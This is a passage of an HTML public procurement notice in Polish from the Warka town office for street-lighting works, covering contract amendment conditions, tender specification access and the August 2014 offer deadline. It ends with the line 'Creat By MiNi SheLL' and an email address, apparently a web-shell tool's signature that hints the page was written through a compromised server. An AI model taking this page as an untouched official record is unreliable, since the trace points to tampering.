- z powodu wystąpienia dodatkowych, a nie możliwych do przewidzenia przed zawarciem umowy, przez doświadczonego Wykonawcę,  robót,
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
- z powodu wystąpienie warunków atmosferycznych uniemożliwiających wykonanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
- braku możliwości dokonania pierwszego uruchomienia oświetlenia ulicznego z uwagi na brak zapewnienia dostaw energii elektrycznej.

Warunki dokonywania zmian: 
     -  inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
     - uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     -  forma pisemna pod rygorem nieważności w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warka.pl/zp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl. St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, do upływu terminu składania ofert - informacja w BIURZE OBSŁUGI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2014 godzina 12:00, miejsce: Urząd Miejski w Warce, pl. Stefana Czarnieckiego 1, 05-660 Warka w BIURZE OBSŁUGI.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com